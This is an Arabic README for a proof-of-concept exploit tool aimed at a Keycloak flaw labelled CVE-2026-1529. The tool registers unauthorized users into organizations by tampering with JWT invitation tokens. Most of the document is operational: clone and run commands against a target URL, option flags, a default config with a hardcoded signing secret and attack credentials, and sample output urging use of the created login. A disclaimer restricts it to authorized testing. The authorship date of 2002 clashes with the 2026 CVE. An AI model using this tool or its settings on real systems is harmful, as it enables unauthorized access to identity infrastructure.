
أداة استغلال لثغرة CVE-2026-1529، توضح تسجيل مؤسسة غير مصرح به في Keycloak عبر التلاعب برمز JWT. تتضمن توليد الرمز، والتلاعب به، وتسجيل المستخدم مع إنشاء تقرير.
Keycloak: تسجيل مؤسسات غير مصرح به عبر التحقق غير السليم من رمز الدعوة
هذه الأداة مخصصة لأغراض التعليم واختبار الأمان فقط. استخدمها فقط على الأنظمة التي لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. مؤلفو هذه الأداة غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
أنشأها: f3ds cr3w est، 2002
CVE-2026-1529 هي ثغرة أمنية حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح به عبر التحقق غير السليم من رمز الدعوة. توضح هذه الأداة الاستغلالية الثغرة من خلال التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.
توجد الثغرة في عملية التحقق من رمز JWT لدعوات المؤسسات. يمكن للمهاجمين التلاعب بحقلي org_id و email في حمولة JWT، مما يسمح لهم بتسجيل المستخدمين في أي مؤسسة دون الحصول على إذن مناسب.
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
pip install -r requirements.txt
chmod +x keycloak-exploit.py
# الاستخدام القياسي مع عنوان URL الهدف
python keycloak-exploit.py https://target-keycloak.com
# عرض المساعدة
python keycloak-exploit.py -h
# عرض الإصدار
python keycloak-exploit.py -v
# استخدام رمز دعوة مخصص
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com
# استخدام معرف مؤسسة مخصص
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
# استخدام ملف إعدادات مخصص
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com
# تفعيل تسجيل التصحيح
python keycloak-exploit.py -d https://target-keycloak.com
| الخيار | الوصف | مطلوب |
|---|---|---|
target | عنوان URL لـ Keycloak الهدف (IP أو نطاق) | نعم |
-t, --token | رمز دعوة مخصص للاستخدام | لا |
-o, --org-id | معرف مؤسسة مخصص | لا |
-c, --config | مسار ملف الإعدادات | لا |
-d, --debug | تفعيل تسجيل التصحيح | لا |
-v, --version | عرض معلومات الإصدار | لا |
-h, --help | عرض رسالة المساعدة | لا |
عند نجاح الاستغلال، سترى مخرجات مثل:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260210_134556.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
=============================================================
by f3ds cr3w est, 2002
=============================================================
إذا فشل الاستغلال، سترى:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable
❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
CVE-2026-1529-POC/
├── keycloak-exploit.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # This file
├── config/
│ └── default_config.json # Default configuration
├── utils/
│ ├── jwt_utils.py # JWT manipulation utilities
│ ├── http_utils.py # HTTP client utilities
│ └── crypto_utils.py # Cryptographic utilities
├── output/
│ ├── logs/ # Log files
│ └── reports/ # Exploit reports
تستخدم الأداة ملف إعدادات افتراضي (config/default_config.json) بالإعدادات التالية:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
يمكنك إنشاء ملف إعدادات مخصص واستخدامه مع الخيار -c:
{
"exploit": {
"default_username": "custom_user",
"default_password": "CustomPassword123!",
"default_email": "[email protected]",
"timeout": 60,
"max_retries": 5
},
"jwt": {
"algorithm": "HS256",
"secret_key": "custom-secret-key",
"token_expiry": 7200
}
}
تستغل الأداة التحقق غير السليم من JWT من خلال:
org_id لاستهداف مؤسسة مختلفةemail إذا لزم الأمرأخطاء الاتصال
أخطاء التحقق من الرمز
org_id, email, invitation_type)فشل التسجيل
فعّل تسجيل التصحيح لاستكشاف الأخطاء بالتفصيل:
python keycloak-exploit.py -d https://target-keycloak.com
logs/exploit.logoutput/reports/exploit_report_YYYYMMDD_HHMMSS.txtتؤدي الأداة الفحوصات التالية:
يُعتبر الاستغلال ناجحًا إذا:
هذه الأداة مقدمة لأغراض التعليم واختبار الأمان فقط. استخدمها على مسؤوليتك الخاصة.
أنشأها: f3ds cr3w est، 2002
للتواصل: للأسئلة أو الملاحظات، يرجى الرجوع إلى مستودع المشروع.
تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة. استخدم هذه الأداة بحكمة وأخلاقية.
بواسطة f3ds cr3w est، 2002